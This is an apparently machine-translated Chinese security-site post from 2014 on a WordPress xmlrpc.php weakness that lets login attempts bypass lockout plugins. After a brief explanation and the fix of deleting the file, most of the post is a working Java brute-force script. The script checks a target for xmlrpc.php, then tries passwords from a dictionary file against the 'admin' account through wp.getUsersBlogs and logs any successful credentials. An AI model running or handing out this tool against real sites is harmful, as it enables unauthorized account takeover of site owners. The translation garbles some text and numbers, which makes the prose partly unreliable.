Wordpress xmlrpc. php brute force vulnerability-a vulnerability warning-the black bar safety net

ID MYHACK58:62201452077
Type myhack58
Reporter 佚名
Modified 2014-08-04T00:00:00


wordpress is very popular open source blog, which provides remote POST method is used with pathxmlrpc.phpthis file recently broke xmlrpc vulnerability, the vulnerability principle is through the xmlrpc authentication, even when authentication fails, it will not be Wordpress to install the security plug-in recording, so it will not trigger the password wrong N times is locked. Therefore it is possible is brute force, if the password is a weak password, then it is quite dangerous. The simplest solution is to deletexmlrpc.phpthis file. Nothing else, use java to write a brute force script, in fact, is to take the various user name, password, to continue to callxmlrpc. phpp this document, testing and certification results, is simple. Just for entertainment, to brute force the thing, everyone to be careful.

Xmlrpc.javathe source code is as follows:

package com. yeetrack. security. wordpress; import org. apache. http. client. ClientProtocolException; import org. apache. http. client. config. RequestConfig; import org. apache. http. client. methods. CloseableHttpResponse; import org. apache. http. client. methods. HttpGet; import org. apache. http. client. methods. HttpPost; import org. apache. http. entity. StringEntity; import org. apache. http. impl. client. CloseableHttpClient; import org. apache. http. impl. client. HttpClients; import org. apache. http. util. EntityUtils; import org. slf4j. Logger; import org. slf4j. LoggerFactory; import org. testng. annotations. Test; import java. io.; / * Created by victor wang on 2014/8/2. * Use of wordpress xmlrpc vulnerability, brute force password */ public class Xmlrpc { private String userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/2 0 1 0 0 1 0 1 For Firefox/31.0"; RequestConfig requestConfig = RequestConfig. custom(). setConnectionRequestTimeout(4 0 0 0). setConnectTimeout(4 0 0 0) . setSocketTimeout(4 0 0 0). build(); private static Logger logger = LoggerFactory. getLogger(Xmlrpc.class); private CloseableHttpClient httpClient = HttpClients. custom() . setUserAgent(userAgent) . setDefaultRequestConfig(requestConfig) . build(); / * check whether the domain name exists xmlrpc. php this file / private boolean checkXmlRpcFile(String domain) { domain = wrapperUrl(domain); if(domain==null) return false; HttpGet get = new HttpGet("http://"+domain+"/xmlrpc.php"); get. addHeader("User-Agent", userAgent); CloseableHttpResponse response = null; String resultString = null; try { response = httpClient. execute(get); if(null == response || the response. equals("")) return false; resultString = EntityUtils. toString(response. getEntity()); } catch (IOException e) { e. printStackTrace(); } return resultString. contains("XML-RPC server accepts POST requests only."); } / * Violent attempt */ private boolean forceLogin(String username, String password, String url) { //try to login HttpPost post = new HttpPost("http://"+wrapperUrl(url)+"/xmlrpc.php"); post. addHeader("User-Agent", userAgent); String xmlString = "<? xml version=\"1.0\" encoding=\"iso-8 8 5 9-1\"?>< methodCall> <methodName>wp. getUsersBlogs</methodName> <params> <param><value>"+username+"</value></param> <param><value>"+password+"</value></param> </params></methodCall>"; StringEntity entity = null; try { entity = new StringEntity(xmlString); post. setEntity(entity); CloseableHttpResponse response = httpClient. execute(post); String loginResult = EntityUtils. toString(response. getEntity()); if(null== loginResult || loginResult. equals("")) return false; if(loginResult. contains("isAdmin")) { logger.info(url + "login successful, userename--->" + username + " password--->" + password); return true; } } catch (UnsupportedEncodingException e) { e. printStackTrace(); } catch (ClientProtocolException e) { e. printStackTrace(); } catch (IOException e) { e. printStackTrace(); } return false; } / * purge the url, remove the http://or at the end of the path / private String wrapperUrl(Stringurl) { if(null == url || url. equals("")) return null; if(url. startsWith("http://")) url = url. substring(7); if(url. contains("/")) url = url. substring(0, url. indexOf("/")); return url; } / * hack / @Test public void test() { String url = "http://somewordpress.com/xmlrpc.php"; if(! checkXmlRpcFile(url)) { logger.info(url+"--->does not exist xmlrpc vulnerability"); return; } File file = new File("src/main/resources/1pass00.txt"); //the password dictionary, this online a bunch of a bunch of, or generate their own can also try { FileReader fileReader = new FileReader(file); BufferedReader bufferedReader = new BufferedReader(fileReader); String line = null; int count = 1; while ((line = bufferedReader. readLine()) != null) {- System. out. println("" + count + "" + line); if(forceLogin("admin", line, url)) break; count++; //Thread. sleep(5 0 0); } } catch (Exception e) { e. printStackTrace(); } } }

[1] [2] next